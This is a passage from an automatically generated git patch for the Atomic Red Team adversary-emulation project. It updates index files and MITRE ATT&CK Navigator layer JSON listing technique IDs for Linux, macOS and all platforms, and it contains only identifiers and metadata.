From 507e5b87166102b6c81d74a9d3232b3cb25c6a5a Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Fri, 21 May 2021 20:26:14 +0000
Subject: [PATCH] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 .../art-navigator-layer-linux.json | 2 +-
 .../art-navigator-layer-macos.json | 2 +-
 .../art-navigator-layer.json | 2 +-
 atomics/Indexes/Indexes-CSV/index.csv | 399 +-
 atomics/Indexes/Indexes-CSV/linux-index.csv | 84 +-
 atomics/Indexes/Indexes-CSV/macos-index.csv | 84 +-
 atomics/Indexes/Indexes-CSV/windows-index.csv | 1 +
 atomics/Indexes/Indexes-Markdown/index.md | 832 +-
 .../Indexes/Indexes-Markdown/linux-index.md | 284 +-
 .../Indexes/Indexes-Markdown/macos-index.md | 241 +-
 .../Indexes/Indexes-Markdown/windows-index.md | 26 +-
 atomics/Indexes/Matrices/linux-matrix.md | 92 +-
 atomics/Indexes/Matrices/macos-matrix.md | 82 +-
 atomics/Indexes/Matrices/matrix.md | 196 +-
 atomics/Indexes/Matrices/windows-matrix.md | 106 +-
 atomics/Indexes/index.yaml | 49645 +++++++++-------
 atomics/T1003.003/T1003.003.md | 2 +-
 atomics/T1036.003/T1036.003.md | 2 +-
 atomics/T1037.004/T1037.004.md | 10 +-
 atomics/T1055.001/T1055.001.md | 4 +-
 atomics/T1055.012/T1055.012.md | 2 +-
 atomics/T1056.004/T1056.004.md | 6 +-
 atomics/T1059.003/T1059.003.md | 4 +-
 atomics/T1059.005/T1059.005.md | 2 +-
 atomics/T1070.005/T1070.005.md | 2 +-
 atomics/T1070/T1070.md | 2 +-
 atomics/T1078.001/T1078.001.md | 2 +-
 atomics/T1124/T1124.md | 4 +-
 atomics/T1127.001/T1127.001.md | 2 +-
 atomics/T1133/T1133.md | 4 +-
 atomics/T1134.004/T1134.004.md | 2 +-
 atomics/T1135/T1135.md | 2 +-
 atomics/T1176/T1176.md | 10 +-
 atomics/T1197/T1197.md | 8 +-
 atomics/T1207/T1207.md | 2 +-
 atomics/T1218.007/T1218.007.md | 2 +-
 atomics/T1220/T1220.md | 2 +-
 atomics/T1222.002/T1222.002.md | 2 +-
 atomics/T1485/T1485.md | 4 +-
 atomics/T1486/T1486.md | 4 +-
 atomics/T1489/T1489.md | 4 +-
 atomics/T1496/T1496.md | 4 +-
 atomics/T1497.001/T1497.001.md | 4 +-
 atomics/T1546.004/T1546.004.md | 10 +-
 atomics/T1546.010/T1546.010.md | 2 +-
 atomics/T1546.011/T1546.011.md | 2 +-
 atomics/T1546.012/T1546.012.md | 2 +-
 atomics/T1547.001/T1547.001.md | 2 +-
 atomics/T1547.006/T1547.006.md | 2 +-
 atomics/T1550.002/T1550.002.md | 6 +-
 atomics/T1550.003/T1550.003.md | 8 +-
 atomics/T1552.001/T1552.001.md | 2 +-
 atomics/T1555.003/T1555.003.md | 4 +-
 atomics/T1566.001/T1566.001.md | 4 +-
 atomics/T1574.001/T1574.001.md | 9 +-
 atomics/T1574.002/T1574.002.md | 6 +-
 atomics/T1574.006/T1574.006.md | 10 +-
 57 files changed, 27909 insertions(+), 24336 deletions(-)

diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
index 4ddbfaa0..ccd92526 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"
techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techni
queID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one 
test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"tec
hniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"technique
ID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json index 347ecd11..23c8d246 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json 
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true
},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"te
chniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator 
Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T
1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.0
04","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true}]} \ No newline at end of file 
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
index c4b91b77..02a7985d 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"tech
niqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001",
